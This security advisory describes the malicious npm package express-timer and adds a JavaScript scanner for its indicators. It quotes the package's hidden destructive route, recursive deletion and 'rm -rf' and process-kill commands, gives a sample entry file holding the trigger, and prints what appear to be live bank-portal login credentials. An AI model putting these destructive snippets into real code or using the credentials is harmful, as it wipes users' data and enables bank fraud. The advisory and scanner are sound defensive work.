Vulnerability
Malicious code in express-timer (npm)
## Source: amazon-inspector (5b4fd1651a86f29904cbafe5a1d50f51a3108413ce0fef61fd92cfc61dedc683)

express-timer is a destructive supply-chain attack masquerading as an Express security-headers helper. Three independent harm mechanisms fire on install or load:

1. Postinstall backdoor injection (`scripts/inject.js`): The postinstall hook walks up to the installer's project root, locates the main Express entry file, and appends a hidden route handler `app.get('/robots.txt', (req, res) => { if (req.query.verify === 'destroy') { _boom();... } })`. The injected `_boom()` recursively deletes the installer's `./src` directory (`fs.rm(dir, { recursive: true, force: true })`) and kills all node processes (`taskkill /IM node.exe /F` on Windows, `pkill -f "node.*<cwd>"` on Unix). Any remote actor who hits `GET /robots.txt?verify=destroy` on the deployed server can wipe the installer's source and crash node processes. The injection persists in the installer's own source tree even after `npm uninstall`.

2. Auto-scheduled destruction on require (`index.js`): `package.json` sets `main: index.js`, and that file's top-level code calls `scheduleDestructionAfter()` with a 1-minute default timer. After 60 seconds, it executes `rm -rf <cwd>/src` (Unix `execSync`) or the equivalent `fs.rm` on Windows, then kills node/PM2 processes. Simply importing the package destroys the consumer's source tree one minute later, with no opt-in, no documented API, and no guard.

3. Bundled bank-fraud tooling (`ibbl_statment.php`): The tarball ships a PHP scraper hardcoded with credentials (`USER=mohiuddin767272@gmail.com`, `PASS=Sorifa@2020`) for Islami Bank Bangladesh's customer agent portal at `https://agent.islamibankbd.com`, used to scrape arbitrary customer NIDs, account numbers, and transactions. This is unrelated to the advertised purpose and redistributes access to a third-party banking system to anyone who installs the package.
Supporting context: `package.json` author is the placeholder `"Your Name"`, the description ("Lightweight security helpers for Express") contradicts the actual behavior, and `dependencies` declares both a self-reference (`express-timer: ^1.0.0`) and a revealing sibling `express-self-destruct1`.
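As an added example (not part of the advisory or of the package itself), the following scanner checks an Express entry file and a `package.json` for the indicators described above: the injected `/robots.txt` route keyed on `req.query.verify`, the recursive `fs.rm`, process-kill commands, the `scheduleDestructionAfter` call, install-time lifecycle scripts, and the self-referencing or sibling dependencies. The regular expressions, the indicator names and the two sample inputs are constructed here for illustration.

```javascript
// Added example: indicator scan for the express-timer injection pattern.
// Indicator names, regexes and the samples below are constructed, not taken
// from the package; they are modelled on the behaviour the advisory describes.
const SOURCE_INDICATORS = [
  // Hidden route that only acts when ?verify=... is present (the advisory's trigger).
  { id: 'robots-destroy-route', re: /app\.\w+\(\s*['"]\/robots\.txt['"][\s\S]{0,200}?req\.query\.verify/ },
  // Recursive, forced deletion of a directory via fs.rm / fs.rmSync.
  { id: 'recursive-force-rm', re: /fs\.rm(?:Sync)?\([\s\S]{0,120}?recursive\s*:\s*true[\s\S]{0,40}?force\s*:\s*true/ },
  // Shell-based deletion as used by the scheduled variant.
  { id: 'shell-rm-rf', re: /execSync\([^)]*\brm\s+-rf\b/ },
  // Killing node processes on either platform.
  { id: 'process-kill', re: /\b(?:taskkill\s+\/IM\s+node\.exe|pkill\s+-f)\b/ },
  { id: 'schedule-destruction', re: /scheduleDestructionAfter\s*\(/ },
];

// Returns the ids of all indicators present in a source file's text.
function scanSource(code) {
  return SOURCE_INDICATORS.filter((ind) => ind.re.test(code)).map((ind) => ind.id);
}

const FLAGGED_DEPS = new Set(['express-timer', 'express-self-destruct1']);
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Returns findings for a parsed package.json: a package that depends on itself,
// a known malicious dependency name, and any script that runs at install time.
function scanManifest(pkg) {
  const findings = [];
  const deps = Object.assign({}, pkg.dependencies, pkg.devDependencies);
  if (pkg.name && Object.prototype.hasOwnProperty.call(deps, pkg.name)) {
    findings.push(`self-dependency:${pkg.name}`);
  }
  for (const dep of Object.keys(deps)) {
    if (FLAGGED_DEPS.has(dep)) findings.push(`flagged-dep:${dep}`);
  }
  for (const hook of INSTALL_HOOKS) {
    if (pkg.scripts && pkg.scripts[hook]) findings.push(`install-hook:${hook}`);
  }
  return findings;
}

// Constructed sample inputs (never executed; the entry file is a plain string).
const SAMPLE_ENTRY = `
const app = require('express')();
app.get('/', (req, res) => res.send('ok'));
app.get('/robots.txt', (req, res) => { if (req.query.verify === 'destroy') { _boom(); } res.end(); });
function _boom() { fs.rm(path.join(root, 'src'), { recursive: true, force: true }, () => {}); }
`;
const SAMPLE_MANIFEST = {
  name: 'express-timer', main: 'index.js',
  scripts: { postinstall: 'node scripts/inject.js' },
  dependencies: { 'express-timer': '^1.0.0', 'express-self-destruct1': '*' },
};

console.log(scanSource(SAMPLE_ENTRY), scanManifest(SAMPLE_MANIFEST));
```

Run the same two functions over a project's real entry file and manifest to check whether the postinstall hook left the route behind after `npm uninstall`.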
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs.